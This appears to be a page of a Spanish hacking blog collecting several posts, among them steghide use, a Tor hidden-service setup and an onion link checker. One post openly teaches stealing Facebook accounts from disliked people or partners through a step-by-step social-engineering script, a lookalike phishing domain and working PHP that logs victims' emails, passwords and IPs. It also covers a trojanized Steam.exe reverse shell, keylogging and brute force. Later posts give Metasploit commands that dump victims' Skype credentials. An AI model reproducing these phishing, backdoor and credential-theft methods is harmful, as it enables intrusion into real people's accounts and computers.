miércoles, 5 de octubre de 2016

Escaneografia con steghide - ocultando archivos en imagenes

Saludos nuevamente mis fieles lectores en esta oportunidad les traigo la herramienta Steghide, que sirve para ocultar nuestros archivos en un formato de imagen, utilizando el proceso de escaneografia.

Steghide  es un programa de estenografía que permite ocul­tar datos en varios tipos de imagen- y archivos de  audio.

Los respectivos muestreos de frecuencia de color no varían lo que hace que el adjunto  soporte  pruebas  estadísticas del primer orden.
Sus características incluyen el compactado y el encriptadode los datos adjuntos, y revisión automática de integridad usando  un  checksum. Se reconocen los formatos de archivo JPEG, BMP, WAV y AU para usar como archivos de portada. No existen  restricciones en el formato de los datos ocultos.

Referencia:



En este escenario lo ejecutaremos en Kali linux (Debian), primero debemos instalarlo.

root@kali:~# apt-get install steghide
En mi caso ya tenia instalado el steghide, pero la añadir nuevamente su instalación se ha actualizado una nueva versión.


Una ves instalado lo siguiente haremos un ejemplo con un archivo .TXT y una imagen en JPG.






Como vemos los archivos que utilizaremos son:

  1. oe.txt
  2. rosangela-espinoza.jpg

Entonces lo que haremos sera empezar con el procedimiento:

root@kali:~/Desktop# steghide embed -cf rosangela-espinoza.jpg -ef oe.txt

embed > sirve para adjuntar  el archivo txt en la imagen de formato jpg




Luego de añadir sus respectivos argumentos, nos saldrán 2 lineas que nos dirán "salvoproducto", la cual deben ingresar una contraseña en mi caso añadí:

tujefaxD

una ves hecho el procedimiento empezara nuestro proceso de ocultación, entonces veremos como quedo nuestro archivo.

Vemos que la imagen no ha sufrido ninguna modificación gráfica, ni en su extensión, pero debo aclarar los siguiente: que dependiendo de la cantidad de almacenamiento del archivo que deseamos ocultar, nuestra imagen tendrá también dicho peso. 

Pero como mi archivo oe.txt tiene menos de 8 caracteres no aumentado el tamaño del archivo.

Bueno entonces, que pasaría si deseas extraer el archivo oculto en la imagen, en mi caso yo soy algo paranoico mis contraseñas las tengo siempre en local en un txt en mi pendrive, pero gracias a  steghide lo puedo ocultar en un formato de imagen, que solo le permitirá leer al que ejecute el archivo la imagen y no en texto plano donde verdaderamente se encuentra mi password.

vemos que se ha extraído completamente el archivo "oe.txt"

comprobamos que no ha sido afectado ninguna carácter de mi supuesta password, espero les halla gustado este articulo.

no solamente pueden adjuntar un archivo de texto, si no cualquier tipo de archivo que deseen ocultar.

Un saludo!! 

domingo, 2 de octubre de 2016

Verificar si el servidor web onion esta disponible con Onioff

Saludos fieles lectores, nuevamente me eh tomado un descanso en este humilde blog, en esta oportunidad les traigo una herramienta muy útil para los amantes de la "Deep Web" llamada Onioff.

Como bien sabemos Tor Browser es el un servicio de Anonimato cuyas conexiones trabajan de manera independiente denominadas "Nodos", las cuales tienen conexiones "Socks4" y "Socks5".

Si no conoces el servidor Tor, me encantaría que visites mi segundo Post donde enseño como instarlo y configurarlo.

http://www.backtrack-omar.com/2015/09/instalar-tor-browser-en-kali-linux-20-y.html  

El siguiente POST es sobre su mensajería encriptada de Tor, las cuales pueden ser utilizadas en Gmail, etc.
 

http://www.backtrack-omar.com/2015/10/install-and-configure-tor-messenger.html


Si deseas crear tu servidor "Onion" desde tu Debian puedes visitar este Post.

http://www.backtrack-omar.com/2016/05/crear-nuestro-servidor-onion-en-kali.html

Onioff

Onioff es una herramienta Open Source es simple, cuyo fin es verificar que los servidores web onion esten disponible o no.

¿Quien no se aburre de encontrar un link y pegarlo en nuestro navegador Tor para verificar si esta valido o no, introduciéndolo uno por uno?
 Pues llego la solución a nuestro problema.

Descarga



root@kali:~# git clone https://github.com/k4m4/onioff.git
ot@kali:~# cd onioff
root@kali:~/onioff# pip install -r requirements.txt




En mi caso los requisitos ya los tenia instalado, con ustedes ese procedimiento sera mas extenso ya que descargara cada paquete y luego procedera a instalarse.

Modo de Uso

Si desean ver las opciones pueden utilizar su sintaxis, pero antes debemos darle privilegios a la carpeta.

root@kali:~/onioff# chmod 775 *
root@kali:~/onioff# python onioff.py -h


Como podemos ver esta herramienta tiene 2 formas de testear los links de manera independiente o ejecutando un archivo en .txt con varias cantidades de paginas.

Primero deben tener instalado "Tor" como servicio dependiente en GNU/debian - Kali linux como otros S.O de seguridad Informática, tiene instalado por defecto dicho servicio no hay necesidad de instalarlo.

Si no lo tienes lo puedes instalar de la siguiente manera:

root@kali:~/onioff#apt-get install tor

Ejemplos

Antes de ejecutarlo deben iniciar el servicio de tor de la siguiente manera:

root@kali:~/onioff# service tor start // iniciar servidor tor
root@kali:~/onioff# service tor status // ver el estado del servicio si se encuentra activo


 


Haremos el primer ejemplo, que sera ejecutar la verificación de un solo link en onioff, para comprobar su funcionalidad.

root@kali:~/onioff# python onioff.py http://kpdqsslspgfwfjpw.onion/



Como vemos el servidor onion ,esta fuera de servicio.

Introducimos otro link en este caso es del buscador " DuckDuckgo "

seguiremos con el segundo ejemplo, primero crearemos un archivo con Extensión "TXT" lo llamare links.txt donde añadiremos los links de los servidores onion que deseemos testear.

Luego de ello pasaremos a ejecutarlo se la siguiente manera:

root@kali:~/onioff# python onioff.py -f links.txt -o reporte.txt

pasare a explicar sus argumentos:

-f (añades el nombre del archivo)  
 
-o (nombre del archivo donde se guardara los datos positivos)

 Les dejare algunos servidores web donde podran encontrar muchos servidores Onion para que hagan su TEST, se que les encatara.


Gracias por visitar este humilde Post, Saludos y éxitos para todos.

sábado, 1 de octubre de 2016

Crear nuestro servidor Onion en Kali Linux 2016



Saludos mis fieles lectores nuevamente, estuve alejado del blog tomando unas vacaciones estudiantiles si se puede decir de esa manera jajaja, ante mano deseo agradecer a cada uno de ustedes por brindarme su apoyo y seguir leyendo este humilde blog.

En esta oportunidad les enseñare a como crear tu propio servidor "ONION", en tu Sistema Operativo Kali Linux. 

Lo primero que debemos tener instalado es "Tor" corriendo en nuestro sistema, como Kali tiene por defecto el navegador no lo tendré que instalar,  pero los que corren un sistema Debian puro o Ubunto la forma de instalacion es:


root@browsernet:~# sudo apt-get install tor

Luego de ello debemos entrar a la carpeta donde se encuentra los archivos de configuración de Tor

root@browsernet:~# cd /etc/tor/

Luego de ello debemos editar el archivo torrc para configurar nuestra conexión de datos y adjuntar algunas lineas.

root@browsernet:/etc/tor# sudo leafpad torrc


Lo primero que haremos sera buscar la siguiente linea: HiddenServiceDir



como podemos ver, estas son las lineas las cuales vamos a modificar:

Lo que debemos es quitarle el signo a la primera y segunda linea de la parte de arriba la cual es # > "Michi", así le dicen en mi Pais, no se como le dirán en el suyo, luego como pueden observar la segunda linea:


HiddenServicePort 80 127.0.0.1:80

Podemos observar a simple vista que los numeros 80 son el puerto que ejecutaremos la salida de nuestro servidor & la IP local del servidor establecida como un Proxy, lo que haremos sera añadir nuestra IP local un ejemplo seria el  siguiente.

HiddenServicePort 80 192.168.1.36:80

Ahora lo que haremos sera iniciar el servidor de TOR: 

sudo service tor start
  
Una ves iniciado nuestro servidor debemos actualizar nuestro sistema & instalar el servidor apache2 

sudo apt-get update && sudo apt-get install apache2

Una ves terminado  todo el proceso, iniciamos el servidor apache, posteriormente debemos reiniciar nuestro servidor apache, de la siguiente manera.

sudo service apache2 start

sudo service apache2 restart 

igualmente el servidor Tor.

sudo service tor reload

Ahora lo que se preguntaran todos, ¿Cual es nuestra URL onion?
para ello debemos ejecutar nano con permisos administrador para poder leer el archivo donde se encuentra la URL onion:

sudo nano /var/lib/tor/hidden_service/hostname

Como vemos la URL onion de mi servidor es:   pjzcpoao77fop7ay.onion
lo que haremos sera probarla en el navegador Tor Browser.


Tenemos nuestro servidor Onion, totalmente publica : ), cabe decir que si ustedes desean subir archivos a su servidor, deben entrar al directorio:

/var/www/html
    
de igual manera el servidor corre con "Apache" "Mysql", como pueden observar en la imagen, para que puedan comprobarlo pueden verlo aquí mismo. 


Espero haberles brindado esta información para su laboratorio de Pentest en Onion, Saludos!

Robando credenciales de Facebook - Mi metodología



Saludos mis fieles lectores en esta oportunidad vamos a tocar un tema que ha muchos "Niños Ratas" les va gustar, que es el Arte de hackear cuentas de facebook por diferentes métodos.

Métodos:



  • Ingeniería Social
  • Phishing
  • POST Explotacion
  • Backdoors
  • Keyloggers
  • Brute Force


Sin duda Facebook es el principal dominio de mensajería a nivel mundial utilizado por todas las clases sociales, la compañía creada por Mark Zuckerberg  ha alcanzado el agüe durante sus principios y hasta el día de hoy sigue siendo tendencia gracias a sus adaptaciones que satisfacen las necesidades de sus usuarios.




    Fundación4 de febrero de 2004, Cambridge, Massachusetts, Estados Unidos


Este es el punto en donde un "Atacante" o un "Niño Rata" entra en acción, quien de nosotros en sus principios no ha querido entrar a una cuenta de Facebook de una persona que nos cae mal y cambiarle la contraseña¿? o en la mayoría de usuarios desean obtener la contraseña de sus novios(a) para ver si los están engañando

  1. Ingeniería Social


 La ingeniería social es un método que se basa desde los principios del hombre, la cual ha sido crucial  para victorias grandes en las batallas y guerras, un claro ejemplo es Helena de Troya.

Quien no ha escuchado la historia del mítico caballo de Troya en su infancia , ya sea por vídeos animados , libros, etc,
La historia se basa prácticamente en la reina Helena, este personaje es hija de un dios que en vida encarna una gran belleza pero a la vez tendría una gran maldición  que traería consecuencias muy graves y trágicas para ella , en su momento el origen de la guerra de Troya  fue una de las guerras épica de toda la historia de la humanidad, a la vez trata de una historia de amor de París y Helena, sin embargo la guerra comenzó cuando "París" secuestra a la princesa por acto de amor, y ahí juega el rol importante de personas muy conocidos en la historia , como reyes y guerreros .
La guerra se basa entre dos civilizaciones la griegas por el rey Agamenon y la troyana por el rey Priamo.

El rey Agamenon enterado de que helena fue secuestrada , manda  una flota de 1000 barcos del mar egeo en busca de helena los griegos buscaron por mas de 10 años pero no consiguieron nada , el guerrero mas privilegiado en su momento de Grecia fue Akiles  que combatió con Hector otro guerrero privilegiado de Troya en una pelea épica entre ambos guerreros, Hector sin embargo murió en la pelea  , pero las murallas de troya sigue en pie, ahí  fue cuando los Griegos construyeron un caballo de madera sobre ruedas gigante en la cual se escondieron los soltados Griegos y recurrieron al engaño , los soldados troyanos pensaron que era un regalo y metieron el caballo a la cuidad ese mismo día  mientras que los troyanos dormían los soldados griegos posteriormente aprovecharon para salir del caballo y atacar a los griegos  de la manera mas estratégica , troya cae pero su leyenda seguirá por todos los siglos.

Narre una pequeña historia , para que vean como hasta en una guerra se pudo utilizar la ingeniería social y afectar los papeles de la misma, solo jugando con la confianza de la victima.
En la informática la ingeniería social juega con rol muy importante para conseguir datos de nuestra victima por medio  de técnicas de infiltración de datos por directorios sensibles o base de datos, para luego obtener datos de la victima que nos permita tener una comunicación con ella, para luego obtener datos físicos y posteriormente para nuestro beneficio malicioso

"El método consiste en engañar a la victima mediante la "Palabra o el acto"

En nuestro escenario la Ing. social debe jugar un rol importante acompañado de algunos métodos, entre ellos el conocido "Phishing"


 El Phishing consiste en crear una pagina web falsa(Clonada), que tenga la misma caracterizara que una pagina oficial en este caso "Facebook", luego enviarla a nuestra victima, para que añada sus credenciales y obtener los datos del usuario.

Ejemplo:

Victima  - Maria
Atacante - Omar

Maria es Fans de Justin bieber, le gusta la musica POP y le encanta ver videos coreanos.

Yo, lo primero que haré sera estudiar detalladamente a mi victima, lo que haría seria ganándome su confianza poco a poco, comenzando con el "Hola" y así consecutivamente hablando de lo que mas le gusta. Hasta llegar al punto necesario de tener nuestro "Phishing" subido a un servidor y decirle lo siguiente:

Maria he encontrado un grupo privado de facebook de Justin bieber, donde regalan todo tipo de discos originales y que también tenemos "Videocamp" con nuestro ídolo.

¿Deseas que te envié el link?

¿Díganme quien joven o señorita rechazaría tal comentario?  


1- El dominio que deben crear debe ser algo parecido así www.justin-facebook.grups.com 
¿porque?
Para que la victima no sospeche que sea una web falsa o algo, pero como que parece ligar verdad.

La cual pueden comprarla en cualquier HOSTING.





2- La victima seguramente nos dirá,

"Pero me sale facebook de nuevo que hago entro con mi cuenta?"

En mi caso le diré "Si", porque es un grupo secreto y no cualquiera entra ahí, y si quieres le mandas un Screenshot de un grupo de facebook original, editas la fuente y todo eso para que sea mas creíble.


La victima ya creído todo nuestro "Cuento" Añadirá sus credenciales.

El punto es el siguiente "Nosotros debemos añadir una redireccion a un grupo de facebook que hemos escogido ejemplo a un grupo de Fans" para que sea 100% creíble y no sospeche nada








--------------------------------------------------------------------------------------------------------------------------
<?php

$habbo = $_POST['email']; 
$password = $_POST['pass'];
$ip = $_SERVER['REMOTE_ADDR']; 
$f = fopen("Dark.html", "a"); 
fwrite ($f, 'Email: [<b><font color="#0000FF">'.$habbo.'</font></b>] Password: [<b><font color="#FF0040">'.$password.'</font></b>] IP: [<b><font color="#FE2EF7">'.$ip.'</font></b>]<br>');
fclose($f);

header("Location: https://www.facebook.com/groups/616258998512511/?ref=br_rs");
?>
--------------------------------------------------------------------------------------------------------------------------

Siguiendo con el tema, una ves obtenido las credenciales la tendremos en un archivo llamado "Dark.html" si la subiríamos a un servidor web seria así.




Pero como estoy utilizando en este ejemplo Social Engineer Toolkit nos saldría así

http://www.backtrack-omar.com/2014/04/clonando-sitio-web-con-set-social.html



¿Bastante sencillo verdad?

Entonces vamos a  pasar al segundo método "POST Explotacion", consiste en enviar un archivo infectado(Payload) a nuestra victima, el payload la cual tiene como función Explotar el sistema en su totalidad para controlarlo remotamente mediante conexiones "Reversas".

En este escenario le daremos paso a "Metasploit Framework"



Les dejare unos POST'S donde les enseñare a como utilizar Metasploit Framework :


http://www.backtrack-omar.com/2015/09/2015-flash-0day-exploit-hackingteam.html
http://www.backtrack-omar.com/2015/10/vnc-remote-connection-all-windows.html
http://www.backtrack-omar.com/2015/10/beef-browser-exploitation-framework.html
http://www.backtrack-omar.com/2015/10/mitm-man-in-middle-ettercap-mitmf-beef.html
http://www.backtrack-omar.com/2015/10/unicorn-la-herramienta-de-infeccion.html
http://www.backtrack-omar.com/2015/09/explotando-kali-linux-20-cve-2015.html
http://www.backtrack-omar.com/2015/10/evadiendo-av-codificando-payloads-con.html
http://www.backtrack-omar.com/2015/10/winrar-nuestro-viejo-aliado-de.html
http://www.backtrack-omar.com/2015/03/las-viejas-macros-siempre-en-accion.html
http://www.backtrack-omar.com/2014/01/aprendiendo-metasploit-avanzado.html


Comencemos mi victima en este caso es un "Dotero" que le tengo cólera, y este tipo entra en cabinas publicas especialmente en la numero "8", o pueden utilizar el método de engañar a esa persona como lo hicimos por el Pishing para infectarlo con este método que les enseñare.

Como es una cabina publica cualquier "Persona" puede pagar y adquirir el servicio, entonces lo primero que haré sera es copiar el archivo "Steam.exe"
y compilarlo con una herramienta llamada "Shellter" para añadirle un Payload de conexión reversa entre mi ordenador con  MI IP Publica y mi Puerto de escucha,(Configurando el Router) para poder hacer ataques LAN, y conectarnos al sistema de la victima.

En mi caso lo haré locamente.


 http://www.backtrack-omar.com/2015/10/evadiendo-av-codificando-payloads-con.html




Como vemos el archivo supuesta mente esta esta en esa "Cabina Publica", lo que hacen siempre los Kit Rats es abrir el Steam, pero cuando el ejecute no cargara el Steam, si no que tendremos automáticamente controlado el sistema "Backdorizado".


Ya tenemos todo listo para el proceso de utilizar el método "Keyloggers"

Ya activado el grabador de teclados "Keyloggers", nuestra victima entrara a facebook normalmente.


Pero en otro plano nosotros tendremos las credenciales de usuario:


entonces interpretando las grabaciones del teclado , Datos del Usuario:

Ctrl+Alt+Q = @

User:Jorge-dota2015@hotmail.com

Pass:mamasita12345


Como vemos no hay complejidad para realizar un la metodología de Ing social basado con la imaginación, siempre y cuando estemos respaldados por una herramienta que nos permita lo siguiente.

Como siempre el ultimo recurso para obtener la contraseña de un objetivo es el conocido
"Brute Force" - que consiste en un ataque con contraseñas que se ejecutaran automáticamente en una herramienta privada.


Ustedes seguramente dirán, pero Facebook te bloquea al pedir peticiones añadiendo la confirmación del "Captcha", pues para la suerte de ustedes "NO" por el simple hecho que la herramienta esta basada en las conexiones por "Headers", las cuales funcionan directamente con la colectividad de los "form"

La idea fundamental del Brute Force o Fuerza bruta es la complejidad del diccionario que tengan.
Una ves que hallamos obtenido la contraseña "Les llegara un mensaje a a victima" como este
Una buena idea para ejecutarlo sin  dejar rastros en el momento preciso es hacerlo en horas de la madrugada o en las horas que la victima NO este, Saludos!


Happy Hacking!!!!!!!!!!!!!!!!!! : )


Dump skype account our victim for Metasploit


Saludos fieles lectores a mi humilde blog, siguiendo con el pequeño maratón de los complementos de Metasploit Framework jajaja, lo que haremos ahora sera Dumpear los datos de las cuentas almacenadas de nuestras victimas.




Como ustedes ya saben, necesitamos una Session Meterpreter para conectarnos con nuestra victima y enviar el Exploit remotamente, dejare los siguientes POST donde enseño como hacerlo.

http://www.backtrackomar.com/2015/09/2015-flash-0day-exploit-hackingteam.html
http://www.backtrackomar.com/2015/10/vnc-remote-connection-all-windows.html
http://www.backtrackomar.com/2015/10/beef-browser-exploitation-framework.html
http://www.backtrackomar.com/2015/10/mitm-man-in-middle-ettercap-mitmf-beef.html
http://www.backtrackomar.com/2015/10/unicorn-la-herramienta-de-infeccion.html
http://www.backtrackomar.com/2015/09/explotando-kali-linux-20-cve-2015.html
http://www.backtrackomar.com/2015/10/evadiendo-av-codificando-payloads-con.html
http://www.backtrackomar.com/2015/10/winrar-nuestro-viejo-aliado-de.html
http://www.backtrackomar.com/2015/03/las-viejas-macros-siempre-en-accion.html
http://www.backtrackomar.com/2014/01/aprendiendo-metasploit-avanzado.html

Una ves explotado el sistema de nuestra victima, como vemos en la siguiente imagen:




Añadiremos "Background" para salir de session meterpreter y añadiremos lo siguiente:

--------------------------------------------------------------------------------------------------------------------------
msf exploit(handler) > use post/windows/gather/credentials/skype
msf post(skype) > set SESSION 1
SESSION => 1
msf post(skype) > exploit
--------------------------------------------------------------------------------------------------------------------------

en la sintaxis set SESSION 1, añadí el numero 1 por el simple hecho que es la primera session de conexión que hemos recibido.

Si ustedes desean ver la lista de las sesiones lo pueden hacer  añadiendo el comando sessions -i , pero antes deben salir de la session meterpreter mediante background.
Una ves hecho  todo lo siguiente, le daremos Exploit.









Como vemos nos Dumpeo la cuenta de Skype registrada de nuestra victima:

El USER de la cuenta la oculte por privacidad, pero la contraseña NO, porque vemos que esta en HASH md5.

Ejemplo:

pepito:018347a360343c4d1b88d8e4dfab756a




Dado lo siguiente, usted puede hacer un ataque de fuerza bruta para obtener la contraseña, Saludos fieles lectores.

Send vídeo Youtube the victim with Metasploit



Saludos mis fieles lectores en esta oportunidad tocaremos algo totalmente gracioso para nosotros mediante un exploit poco conocido que nos permite abrirle una ventada en modo pantalla grande de nuestra victima, reproduciendo un video de Youtube, que puede asustar y dejar mudo a cualquiera de nosotros, si es que algún día nos pasa.

Lo primero que debemos hacer es obtener una Session meterpreter de nuestra victima, en mis POST'S anteriores pueden buscarlos,  ya sean POST-Explotación o Exploit Remotos.

http://www.backtrack-omar.com/2015/09/2015-flash-0day-exploit-hackingteam.html
http://www.backtrack-omar.com/2015/10/vnc-remote-connection-all-windows.html
http://www.backtrack-omar.com/2015/10/beef-browser-exploitation-framework.html
http://www.backtrack-omar.com/2015/10/mitm-man-in-middle-ettercap-mitmf-beef.html
http://www.backtrack-omar.com/2015/10/unicorn-la-herramienta-de-infeccion.html
http://www.backtrack-omar.com/2015/09/explotando-kali-linux-20-cve-2015.html
http://www.backtrack-omar.com/2015/10/evadiendo-av-codificando-payloads-con.html
http://www.backtrack-omar.com/2015/10/winrar-nuestro-viejo-aliado-de.html
http://www.backtrack-omar.com/2015/03/las-viejas-macros-siempre-en-accion.html
http://www.backtrack-omar.com/2014/01/aprendiendo-metasploit-avanzado.html


Una ves hemos explotado el sistema de nuestra victima, saldremos de la session con el comando "background", luego  pasaremos añadir el Exploit

--------------------------------------------------------------------------------------------------------------------------
msf > use post/multi/manage/play_youtube
msf post(play_youtube) > set SESSION 1
msf post(play_youtube) > set VID 8o8EWWKyZmw
msf post(play_youtube) > exploit
--------------------------------------------------------------------------------------------------------------------------

Si se fijaron  en la parte set VID 8o8EWWKyZmw,  "8o8EWWKyZmwes el ID del video de Youtube que es el siguiente:

https://www.youtube.com/watch?v=8o8EWWKyZmw

Si usted desean solamente modificar el ID pueden añadirle cualquier video que gusten.


En mi caso yo añadí en Manifestó Cyberpunks.

Una ves enviado el "Exploit", a nuestra victima le aparecerá el siguiente mensaje, que no es mas que un complemento de "JAVA", la victima por ende o curiosidad añadirá "Permitir" 


Entonces automáticamente  se reproducirá el video, que ocupara toda la pantalla de nuestra victima :) 

Espero les aya gustado este POST, saludos y éxitos para todos!

Datos del Autor

Estudiante de Ingeniería de computación y sistemas en Perú.
actualmente me estoy dedicando a dar ponencias sobre seguridad Informática.
Soy una persona sencilla y humilde que me encanta aprender nuevos temas en mis tiempos libres.

"Me considero un novato en busca de conocimiento"


Entradas Populares